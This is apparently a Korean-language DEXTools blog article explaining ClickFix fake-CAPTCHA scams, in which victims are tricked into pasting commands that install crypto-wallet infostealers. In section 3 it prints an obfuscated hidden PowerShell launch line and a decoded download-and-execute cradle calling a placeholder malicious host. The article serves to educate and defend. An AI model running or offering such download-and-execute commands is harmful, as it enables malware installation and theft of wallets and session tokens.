ClickFix 암호화폐 사기: 지갑을 훔치는 가짜 CAPTCHA

피싱은 기본적인 가짜 로그인 페이지를 넘어 진화했습니다. ClickFix 암호화폐 유출 공격의 이면에 있는 사회 공학 및 터미널 실행 메커니즘을 분석합니다.
가짜 CAPTCHA 및 ClickFix 암호화폐 지갑 도난
- 의 출현 ClickFix 암호화 사기 는 이러한 전통적인 정신 방화벽을 완전히 우회합니다. ClickFix 공격은 악의적인 온체인 트랜잭션에 서명하거나 개인 키를 피싱 양식에 입력하도록 속이는 대신 사용자와 로컬 운영 체제 간의 운영 관계를 이용합니다. 이러한 공격은 매우 설득력 있고 인위적인 브라우저 오류와 가짜 CAPTCHA 확인 화면을 준비하여 사용자를 속여 암호화된 스크립트를 로컬 시스템 터미널에 직접 복사하여 붙여넣도록 합니다.
- 디지털 자산 도난을 관리하는 벡터는 소극적인 속임수에서 공격적인 사용자 강제 단말기 악용으로 전환되었습니다. 수년간 기본 방어 매뉴얼은 분산 금융 (DeFi) 참가자들은 가짜 로그인 페이지를 가로채고, 스마트 계약 승인 서명을 감사하고, 악의적인 입력으로부터 원시 시드 문구를 보호하는 데 중점을 두었습니다. 할당자가 URL을 확인하고 하드웨어 지갑 확인 화면을 주의 깊게 확인하는 규율 있는 습관을 유지했다면 온체인 자본은 구조적으로 격리된 상태로 유지되었습니다.
- 웹 브라우저는 실패하지 않았습니다. 피해자의 주의가 압박을 받았기 때문이다. 이 가이드에서는 ClickFix 아키텍처를 정의하는 소셜 엔지니어링 트릭, 명령줄 메커니즘 및 유출 루프를 분석합니다.

1. 함정의 심리학: 가짜 CAPTCHA 인터페이스
- ClickFix 공격을 기술적으로 정확하게 분석하려면 먼저 이것이 순수한 사회 공학적 행위로 시작된다는 점을 인식해야 합니다. 공격은 일반적으로 사용자가 손상된 Web3 블로그, 복제된 프로토콜 프런트 엔드 또는 가짜 추적 포털을 방문할 때 나타납니다.
명확한 지갑 연결 프롬프트를 표시하는 대신 페이지에서 즉각적인 기계적 장애물이 발생합니다.
- 화면에는 Cloudflare의 Turnstile, Google reCAPTCHA v3 루프 또는 중요한 브라우저 업데이트 실패 경고(예: "Chrome 업데이트 오류: Direct3D 수집 실패")와 같은 표준 보안 검사를 모방한 고도로 세련된 대화형 창이 표시됩니다.
- 사용자가 확인을 완료하려고 시도하면 인터페이스는 지역화된 렌더링 충돌로 인해 자동 확인이 실패했음을 알리는 대상 알림을 깜박입니다. 그러면 화면에 단계별 "수동 수정"이 제공됩니다.
- 사기는 긴급한 기술 문제를 조작함으로써 피해자의 심리 상태를 방어적인 소비자에서 문제 해결 기술자로 전환하여 특이한 컴퓨터 명령을 훨씬 더 기꺼이 따르게 만듭니다.
2. 명령 실행 파이프라인: 클립보드에서 터미널로
- ClickFix 방법론의 진정한 위험은 브라우저 수준 샌드박스 보안을 완전히 우회하는 기능입니다. 웹 브라우저는 신뢰할 수 없는 인터넷 코드가 컴퓨터 하드웨어를 직접 조작하거나 백그라운드 소프트웨어 응용 프로그램을 실행하는 것을 방지하도록 설계되었습니다.
- ClickFix는 속여서 이 장벽을 회피합니다. 사용자 브라우저의 보안 벽을 바로 지나 악성 소프트웨어를 전달하는 다리 역할을 하도록 합니다.
단계별 주입 메커니즘
1단계: 클립보드 하이재킹: 가짜 인증 팝업은 사용자에게 "수정 코드 복사" 또는 "인증 토큰 복사" 버튼을 클릭하도록 지시합니다. 클릭하면 웹사이트의 JavaScript가 숨겨진 악성 명령 문자열을 사용자의 시스템 클립보드에 직접 복사합니다.
2단계: 터미널 수집 바로가기: 인터페이스는 사용자에게 운영 체제의 기본 명령 유틸리티를 열도록 지시하는 명확한 그래픽 지침을 제공합니다. Windows 사용자의 경우 다음을 누르라는 메시지가 표시됩니다.
Windows Key + R실행 창을 호출하려면 다음을 입력하세요.cmd또는powershell, Enter 키를 누릅니다. macOS 사용자의 경우 Spotlight 검색을 통해 기본 터미널 애플리케이션을 열도록 지시합니다.3단계: 붙여넣기 트리거: 지침은 사용자에게 열린 터미널 창 내부를 마우스 오른쪽 버튼으로 클릭하거나
Ctrl + V(또는Cmd + V(Mac)) "복사된 확인 문자열"을 붙여넣고 실행을 누르세요.
3. 페이로드 분해: Base64 PowerShell 악용
피해자가 복사한 문자열을 단말기에 붙여넣을 때 무해한 인증키를 붙여넣는 것이 아닙니다. 그들은 자동 다운로드 루프를 활성화하도록 설계된 고도로 압축되고 난독화되었으며 자주 Base64로 인코딩된 명령 문자열을 실행하고 있습니다.
Windows 시스템을 대상으로 하는 일반적인 ClickFix 명령 페이로드는 표준 PowerShell 유틸리티 도구를 활용하여 원격 서버에서 2단계 악성 코드 파일을 끌어내립니다.
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc [Base64_Obfuscate시스템에서 디코딩하면 이 백그라운드 명령이 공격적인 자동 다운로드 스크립트로 변환됩니다.
IEX (New-Object Net.WebClient).DownloadString('https://malicious-distribution-node.cdn/payload.ps1')
시스템 악용 매트릭스
| 터미널 매개변수 | 시스템 준수 목적 | 악의적인 이용 목적 |
-NoP (프로필 없음) | 단말기가 개인화된 사용자 프로필을 로드하지 못하도록 합니다. | 실행 속도를 높이고 현지화된 프로필 경고를 우회합니다. |
-NonI (비대화형) | 대화형 프롬프트 또는 확인 메시지를 비활성화합니다. | 사용자 입력 없이 스크립트가 백그라운드에서 완전히 실행되도록 보장합니다. |
-W Hidden (WindowStyle 숨김) | 터미널 실행이 보이지 않는 상태에서 실행되도록 강제합니다. | 피해자에게 알리지 않도록 데스크톱 보기에서 다운로드 활동을 숨깁니다. |
-Exec Bypass | 기본 시스템 실행 제한을 무시합니다. | 승인되지 않은 스크립트가 실행되는 것을 방지하는 보안 구성을 명시적으로 비활성화합니다. |
IEX (호출 표현식) | 문자열 표현식을 로컬 명령으로 평가하고 실행합니다. | 지갑을 훔치는 페이로드를 즉시 다운로드하여 활성 메모리로 직접 실행합니다. |
4. 도난당하는 것: 지갑 Infostealer 페이로드
- 2단계 페이로드가 시스템 메모리 내에서 실행되면 정보 탈취자(Infostealer), Lumma Stealer, Vidar 또는 Medusa 등. 이 악성코드는 일반 문서나 검색 기록을 표적으로 삼지 않습니다. 디지털 자산 공간을 확보하기 위해 정밀하게 설계되었습니다.
- Infostealer는 웹 브라우저가 확장 프로그램과 애플리케이션 상태 파일을 저장하는 로컬 폴더 디렉터리를 프로그래밍 방식으로 대상으로 삼습니다. 적극적으로 긁어냅니다.
.ldb그리고.logMetaMask, Phantom, Coinbase Wallet 및 Rabby와 같은 인기 있는 Web3 확장에 속하는 데이터 맵입니다.
이 로컬 파일에는 암호화된 지갑 금고 키가 보관되어 있습니다. 대칭적으로 악성코드는 브라우저 쿠키와 활성 세션 토큰을 추출합니다.
- 이 스크랩된 모든 데이터는 압축된 아카이브에 압축되어 즉시 암호화된 채널을 통해 공격자의 서버로 다시 전송됩니다. 해커가 이러한 세션 토큰과 로컬 금고를 확보하면 지갑 비밀번호를 오프라인으로 무차별 공격하거나 활성 세션을 가로채어 몇 분 안에 전체 멀티 체인 포트폴리오의 모든 자산을 유출할 수 있습니다.
5. 기존 보안 보호가 실패하는 이유
ClickFix 암호화폐 사기가 높은 성공률을 보이는 주된 이유는 표준 바이러스 백신 도구와 웹 브라우저 확장 프로그램을 체계적으로 우회하기 때문입니다.
구조적 보안 허점: 악성 웹사이트는 물리적으로 다운로드를 강제하지 않기 때문에
.exe또는.dmg파일을 표준 브라우저 채널을 통해 전송하면 브라우저 방어 시스템에서는 위험이 전혀 발생하지 않습니다. 사용자는 텍스트를 복사하고 시스템 터미널을 수동으로 여는 사람입니다.
운영 체제의 관점에서 보면 PowerShell이나 터미널을 열고 관리 명령을 실행하는 것은 컴퓨터 소유자가 명시적으로 승인한 일상적이고 특권적인 활동입니다. 코드는 확인되지 않은 대용량 실행 파일을 로컬 하드 드라이브에 저장하지 않고 활성 메모리 내에서 직접 실행되는 경우가 많기 때문에 기본 서명 기반 바이러스 백신 소프트웨어는 데이터 유출 루프가 이미 완료될 때까지 활동을 표시하지 못하는 경우가 많습니다.
6. DEXTools를 통한 온체인 보호 전략 및 원격 측정
- 최신 사회 공학 위협으로부터 방어하려면 시스템 터미널 주변의 엄격한 경계를 유지하는 동시에 라이브 온체인 움직임에 대한 실시간 조사 가시성이 필요합니다. 잠재적인 로컬 인포스틸러 침해로 인해 자산 구성이 손상된 것으로 의심되는 경우 활성 지갑 데이터 로그를 추적하고 분산 장소에서 미결 계약 권한을 감사하는 것이 남은 자본을 보존할 수 있는 유일한 방법입니다.
- DEXTools는 여러 레이어 1 및 레이어 2 네트워크에서 토큰 활동과 지갑 안정성을 모니터링하는 데 필요한 중요한 분석 데이터 인프라를 제공합니다. 실시간 쌍 탐색기, 다중 체인 거래 추적 및 토큰 계약 보안 감사를 활용하여 시장 참가자는 예상치 못한 지갑 상호 작용이나 의심스러운 자금 이체가 체인에서 나타나는지 여부를 독립적으로 확인할 수 있습니다.
DEXTools에 액세스할 수 있습니다. 여기 오늘부터 거래를 시작하세요!
월렛 드레이너 공격 설명: 인식 및 방지 방법 지갑 보안 체크리스트: 보유 전 반드시 해야 할 10가지 단계 2026년 최고의 토큰 보안 도구: 사기 검사, 감사 및 위험 검토 TON 지갑 배수 사기: 안전을 유지하는 방법면책조항: 이 기사는 정보 제공 목적으로만 작성되었으며 투자 조언, 금융 조언, 거래 조언 또는 기타 종류의 조언을 구성하지 않습니다. DEXTools는 암호화폐나 토큰을 구매, 판매 또는 보유하는 것을 권장하지 않습니다. 사용자는 투자 결정을 내리기 전에 스스로 조사를 수행하고 자격을 갖춘 금융 자문가와 상담해야 합니다. 암호화폐 투자는 변동성이 크고 위험도가 높습니다. DEXTools는 발생한 손실에 대해 책임을 지지 않습니다.